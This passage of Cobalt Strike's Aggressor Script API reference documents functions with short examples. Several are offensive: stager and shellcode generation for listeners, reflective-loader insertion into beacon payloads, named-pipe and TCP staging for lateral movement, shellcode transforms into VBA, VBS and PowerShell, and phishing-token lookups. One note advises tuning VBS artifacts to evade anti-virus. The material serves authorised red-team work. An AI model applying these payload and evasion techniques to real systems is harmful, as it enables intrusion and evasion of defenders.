
$2 - title of the dialog

$3 - a callback function. Called when the user presses yes.

Example

prompt_confirm("Do you feel lucky?", "Do you?", {
   show_mesage("Ok, I got nothing");
});

Back to Top

prompt_directory_open

Show a directory open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple folders?

$4 - a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_directory_open("Choose a folder", $null, false, {
   show_message("You chose: $1");
});

Back to Top

prompt_file_open

Show a file open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple files?

$4 - a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_file_open("Choose a file", $null, false, {
   show_message("You chose: $1");
});

Back to Top

prompt_file_save

Show a file save dialog.

Arguments

$1 - default value

$2 - a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.

Example

prompt_file_save($null, {
   local('$handle');
   $handle = openf("> $+ $1");
   println($handle, "I am content");
   closef($handle);
});

Back to Top

prompt_text

Show a dialog that asks the user for text.

Arguments

$1 - text in the dialog

$2 - default value in the text field.

$3 - a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.

Example

prompt_text("What is your name?", "Cyber Bob", {
   show_mesage("Hi $1 $+ , nice to meet you!");
});

Back to Top

range

Generate an array of numbers based on a string description of ranges.

Arguments

$1 - a string with a description of ranges

Range Result
103 The number 103
3-8 The numbers 3, 4, 5, 6, and 7.
2,4-6 The numbers 2, 4, and 5.

Returns

An array of numbers within the specified ranges.

Example

printAll(range("2,4-6"));

Back to Top

redactobject

Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.

Arguments

$1 - the ID of the post-exploitation object.

Back to Top

removeTab

Close the active tab

Example

bind Ctrl+D {
   removeTab();
}

Back to Top

resetData

Reset Cobalt Strike's data model.

Back to Top

say

Post a public chat message to the event log.

Arguments

$1 - the message

Example

say("Hello World!");

Back to Top

sbrowser

Generate the session browser GUI component. Shows Beacon AND SSH sessions.

Returns

The session browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Session Browser", sbrowser());
See also

&showVisualization

Back to Top

screenshots

Returns a list of screenshots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each screenshot.

Example

printAll(screenshots());

Back to Top

script_resource

Returns the full path to a resource that is stored relative to this script file.

Arguments

$1 - the file to get a path for

Returns

The full path to the specified file.

Example

println(script_resource("dummy.txt"));

Back to Top

separator

Insert a separator into the current menu tree.

Example

popup foo {
   item "Stuff" { ... }
   separator();
   item "Other Stuff" { ... }
}

Back to Top

services

Returns a list of services in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each service.

Example

printAll(services());

Back to Top

setup_reflective_loader

Insert the reflective loader executable code into a beacon payload.

Arguments

$1 - Original beacon executable payload.

$2 - User defined Reflective Loader executable data.

Returns

The beacon executable payload updated with the user defined reflective loader. $null if there is an error.

Notes

The user defined Reflective Loader must be less than 5k.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# Replace the beacons default loader with '$loader'.
# ---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);

Back to Top

setup_strings

Apply the strings defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 – beacon payload to modify

Returns

The updated beacon payload with the defined strings applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply strings to the beacon payload.
$temp_dll = setup_strings($temp_dll);

Back to Top

setup_transformations

Apply the transformations rules defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 – Beacon payload to modify

$2 – Beacon architecture (x86/x64)

Returns

The updated beacon payload with the transformations applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply the transformations to the beacon payload.
$temp_dll = setup_transformations($temp_dll, $arch);

Back to Top

shellcode

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.

Returns raw shellcode for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - true/false: is this shellcode destined for a remote target?

$3 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = shellcode("my listener", false, "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

showVisualization

Switch Cobalt Strike visualization to a registered visualization.

Arguments

$1 - the name of the visualization

Example

bind Ctrl+H {
   showVisualization("Hello World");
}
See also

&showVisualization

Back to Top

show_error

Shows an error message to the user in a dialog box. Use this function to relay error information.

Arguments

$1 - the message text

Example

show_error("You did something bad.");

Back to Top

show_message

Shows a message to the user in a dialog box. Use this function to relay information.

Arguments

$1 - the message text

Example

show_message("You've won a free ringtone");

Back to Top

site_host

Host content on Cobalt Strike's web server

Arguments

$1 - the host for this site (&localip is a good default)

$2 - the port (e.g., 80)

$3 - the URI (e.g., /foo)

$4 - the content to host (as a string)

$5 - the mime-type (e.g., "text/plain")

$6 - a description of the content. Shown in Site Management -> Manage.

$7 - use SSL or not (true or false)

Returns

The URL to this hosted site

Example

site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);

Back to Top

site_kill

Remove a site from Cobalt Strike's web server

Arguments

$1 - the port

$2 - the URI

Example

# removes the content bound to / on port 80
site_kill(80, "/");

Back to Top

sites

Returns a list of sites tied to Cobalt Strike's web server.

Returns

An array of dictionary objects with information about each registered site.

Example

printAll(sites());

Back to Top

ssh_command_describe

Describe an SSH command.

Returns

A string description of the SSH command.

Arguments

$1 - the command

Example

println(ssh_command_describe("sudo"));

Back to Top

ssh_command_detail

Get the help information for an SSH command.

Returns

A string with helpful information about an SSH command.

Arguments

$1 - the command

Example

println(ssh_command_detail("sudo"));

Back to Top

ssh_command_register

Register help information for an SSH console command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

ssh_alias echo {
   blog($1, "You typed: " . substr($1, 5));
}

ssh_command_register(
   "echo", 
   "echo posts to the current session's log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");

Back to Top

ssh_commands

Get a list of SSH commands.

Returns

An array of SSH commands.

Example

printAll(ssh_commands());

Back to Top

stager

Returns the stager for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = stager("my listener", "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

stager_bind_pipe

Returns a bind_pipe stager for a specific Cobalt Strike listener. This stager is suitable for use in lateral movement actions that benefit from a small named pipe stager. Stage with &beacon_stage_pipe.

Arguments

$1 - the listener name

Returns

A scalar containing x86 bind_pipe shellcode.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also

&artifact_general

Back to Top

stager_bind_tcp

Returns a bind_tcp stager for a specific Cobalt Strike listener. This stager is suitable for use in localhost-only actions that require a small stager. Stage with &beacon_stage_tcp.

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

$3 - the port to bind to

Returns

A scalar containing bind_tcp shellcode

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also

&artifact_general

Back to Top

str_chunk

Chunk a string into multiple parts

Arguments

$1 - the string to chunk

$2 - the maximum size of each chunk

Returns

The original string split into multiple chunks

Example

# hint... :)
else if ($1 eq "template.x86.ps1") {
   local('$enc');
   $enc = str_chunk(base64_encode($2), 61);
   return strrep($data, '%%DATA%%', join("' + '", $enc));
}

Back to Top

str_decode

Convert a string of bytes to text with the specified encoding.

Arguments

$1 - the string to decode

$2 - the encoding to use.

Returns

The decoded text.

Example

# convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE");

Back to Top

str_encode

Convert text to byte string with the specified character encoding.

Arguments

$1 - the string to encode

$2 - the encoding to use

Returns

The resulting string.

Example

# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");

Back to Top

str_xor

Walk a string and XOR it with the provided key.

Arguments

$1 - the string to mask

$2 - the key to use (string)

Returns

The original string masked with the specified key.

Example

$mask  = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");

Back to Top

sync_download

Sync a downloaded file (View -> Downloads) to a local path.

Arguments

$1 - the remote path to the file to sync. See &downloads

$2 - where to save the file locally

$3 - (optional) a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.

Example

# sync all downloads
command ga {
   local('$download $lpath $name $count');
   foreach $count => $download (downloads()) {
      ($lpath, $name) = values($download, @("lpath", "name"));
   
      sync_download($lpath, script_resource("file $+ .$count"), lambda({ 
         println("Downloaded $1 [ $+ $name $+ ]"); 
      }, \$name));
   }
}

Back to Top

targets

Returns a list of host information in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each host.

Example

printAll(targets());

Back to Top

tbrowser

Generate the target browser GUI component.

Returns

The target browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Target Browser", tbrowser());
See also

&showVisualization

Back to Top

tokenToEmail

Covert a phishing token to an email address.

Arguments

$1 - the phishing token

Returns

The email address or "unknown" if the token is not associated with an email.

Example

set PROFILER_HIT {
   local('$out $app $ver $email');
   $email = tokenToEmail($5);         
   $out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
   foreach $app => $ver ($4) {
      $out .= "\n\t $+ $[25]app $ver";
   }
   return "$out $+ \n\n";
}

Back to Top

transform

Transform shellcode into another format.

Arguments

$1 - the shellcode to transform

$2 - the transform to apply

Type Description
array comma separated byte values
hex Hex-encode the value
powershell-base64 PowerShell.exe-friendly base64 encoder
vba a VBA array() with newlines added in
vbs a VBS expression that results in a string
veil Veil-ready string (\x##\x##)

Returns

The shellcode after the specified transform is applied

Example

println(transform("This is a test!", "veil"));

Back to Top

transform_vbs

Transform shellcode into a VBS expression that results in a string

Arguments

$1 - the shellcode to transform

$2 - the maximum length of a plaintext run

Notes

  • Previously, Cobalt Strike would embed its stagers into VBS files as several Chr() calls concatenated into a string.
  • Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
  • To get past this VBS limitation, Cobalt Strike opted to use Chr() calls for non-ASCII data and runs of double-quoted strings for printable characters.
  • This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
  • If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.

Returns

The shellcode after this transform is applied

Example

println(transform_vbs("This is a test!", "3"));

Back to Top

tstamp

Format a time into a date/time value. This value does not include seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . tstamp(ticks()));
See also

&dstamp

Back to Top

unbind

Remove a keyboard shortcut binding.

Arguments

$1 - the keyboard shortcut

Example

# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");
See also

&bind

Back to Top

url_open

Open a URL in the default browser.

Arguments

$1 - the URL to open

Example

command go {
   url_open("https://www.cobaltstrike.com/");
}

Back to Top

users

Returns a list of users connected to this team server.

Returns

An array of users.

Example

foreach $user (users()) {
   println($user);
}

Back to Top

vpn_interface_info

Get information about a VPN interface.

Arguments

$1 - the interface name

$2 - [Optional] the key to extract a value for

Returns

%info = vpn_interface_info("interface");

Returns a dictionary with the metadata for this interface.

$value = vpn_interface_info("interface", "key");

Returns the value for the specified key from this interface's metadata

Example

# create a script console alias to interface info
command interface {
   println("Interface $1");
   foreach $key => $value (vpn_interface_info($1)) {
      println("$[15]key $value");
   }
}

Back to Top

vpn_interfaces

Return a list of VPN interface names

Returns

An array of interface names.

Example

printAll(vpn_interfaces());

Back to Top

vpn_tap_create

Create a Covert VPN interface on the team server system.

Arguments

$1 - the interface name (e.g., phear0)

$2 - the MAC address ($null will make a random MAC address)

$3 - reserved; use $null for now.

$4 - the port to bind the VPN's channel to

$5 - the type of channel [bind, http, icmp, reverse, udp]

Example

vpn_tap_create("phear0", $null, $null, 7324, "udp");

Back to Top

vpn_tap_delete

Destroy a Covert VPN interface

Arguments

$1 - the interface name (e.g., phear0)

Example

vpn_tap_destroy("phear0");

Back to Top